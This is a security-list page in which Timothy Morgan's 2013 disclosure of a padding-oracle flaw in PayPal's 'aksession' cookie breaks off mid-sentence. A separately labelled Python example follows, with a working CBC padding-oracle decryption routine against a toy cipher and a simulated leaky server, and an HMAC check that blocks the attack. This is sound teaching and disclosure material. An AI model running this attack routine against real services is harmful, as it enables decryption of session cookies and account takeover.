PayPal's "invalid" aksession Padding Oracle Flaw
Sep 03 2013 02:15PM
Timothy D. Morgan (tmorgan vsecurity com)
Re-posting this, since the moderators ignored it (and my follow-up emails to them).
The main PayPal web site sets a cookie named "aksession" which
contains a blob of base64-encoded ciphertext. This ciphertext is
encrypted using a 64-bit block cipher in CBC mode and does not have
any other integrit...
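Added example (not part of Morgan's post, and nothing here is PayPal's code): a worked CBC padding-oracle attack on a 64-bit-block CBC scheme of the shape the post describes, together with the integrity check whose absence makes it work. The cipher is a toy 8-round Feistel network with a SHA-256 round function, chosen only so the block size is 64 bits; it is an assumption for the demo and is not secure. The "server" is a closure that returns whether PKCS#7 padding verified, the attack recovers the plaintext from that bit alone, and a second closure that verifies an HMAC over IV||ciphertext before decrypting is shown to give the attacker nothing. The cookie contents are a constructed sample value.

```python
"""Added example: CBC padding-oracle decryption with a 64-bit block cipher.
The cipher is a toy 8-round Feistel network (SHA-256 round function), an
assumption for this demo only, not secure and not the cipher in the post."""
import hashlib
import hmac
import os

BLOCK = 8  # 64-bit blocks, as in the aksession cookie

def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def _feistel(key, block, rounds):
    left, right = block[:4], block[4:]
    for i in rounds:
        left, right = right, bytes(a ^ b for a, b in zip(left, _f(key, right, i)))
    return right + left  # final swap: decryption is the same network, rounds reversed

def encrypt_block(key, block):
    return _feistel(key, block, range(8))

def decrypt_block(key, block):
    return _feistel(key, block, reversed(range(8)))

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the observable difference the attack needs
    return data[:-n]

def cbc_encrypt(key, plaintext, iv=None):
    prev, padded = iv or os.urandom(BLOCK), pad(plaintext)
    out = bytearray(prev)
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev)))
        out += prev
    return bytes(out)  # IV || C1 || ... || Cn, what the cookie would carry

def cbc_decrypt(key, blob):
    out = bytearray()
    for i in range(BLOCK, len(blob), BLOCK):
        out += bytes(a ^ b for a, b in zip(decrypt_block(key, blob[i:i + BLOCK]), blob[i - BLOCK:i]))
    return unpad(bytes(out))

def make_padding_oracle(key):
    """Flawed server: decrypts and lets padding validity leak (True/False)."""
    def oracle(blob):
        try:
            cbc_decrypt(key, blob)
            return True
        except ValueError:
            return False
    return oracle

def make_mac_then_decrypt_oracle(key, mac_key):
    """Hardened server: HMAC over IV||ciphertext is checked before any decryption."""
    plain = make_padding_oracle(key)
    def oracle(blob):
        body, tag = blob[:-32], blob[-32:]
        expected = hmac.new(mac_key, body, hashlib.sha256).digest()
        return hmac.compare_digest(expected, tag) and plain(body)
    return oracle

def padding_oracle_decrypt(oracle, blob):
    """Recover the plaintext of IV||ciphertext using only oracle(blob) -> bool."""
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    plaintext = bytearray()
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(cur): the block before the CBC XOR with prev
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ padval  # make the tail decrypt to padval
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:
                    # Last byte: a hit may be a false positive (tail came out as
                    # 02 02, 03 03 03, ...). Flipping the byte before it breaks
                    # those but leaves a genuine 01 valid.
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged) + cur):
                        continue
                inter[pos] = guess ^ padval
                break
            else:
                raise RuntimeError("oracle never accepted a guess; nothing leaks")
        plaintext += bytes(a ^ b for a, b in zip(inter, prev))
    return unpad(bytes(plaintext))

def demo():
    """Attack the flawed server, then show the MAC-checking server gives nothing."""
    key, mac_key = os.urandom(16), os.urandom(16)
    secret = b"user=1234;sessid=deadbeef"  # constructed sample cookie contents
    blob = cbc_encrypt(key, secret)
    recovered = padding_oracle_decrypt(make_padding_oracle(key), blob)
    sealed = blob + hmac.new(mac_key, blob, hashlib.sha256).digest()
    try:
        padding_oracle_decrypt(make_mac_then_decrypt_oracle(key, mac_key), sealed)
        blocked = False
    except RuntimeError:
        blocked = True
    return recovered, blocked

if __name__ == "__main__":
    print(*demo())
```

The attack costs at most 256 oracle queries per byte (plus one confirmation query for the last byte of each block) and needs the key for nothing; the block cipher's strength is irrelevant because only the CBC XOR and the padding check are exercised. In a real deployment the "oracle" is whatever distinguishes a padding failure from a later failure: a different status code, error page, or response time. The MAC-then-decrypt closure removes the leak because every forged block fails the tag check before any padding is inspected; the same effect is obtained with an AEAD mode.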
Copyright 2010, SecurityFocus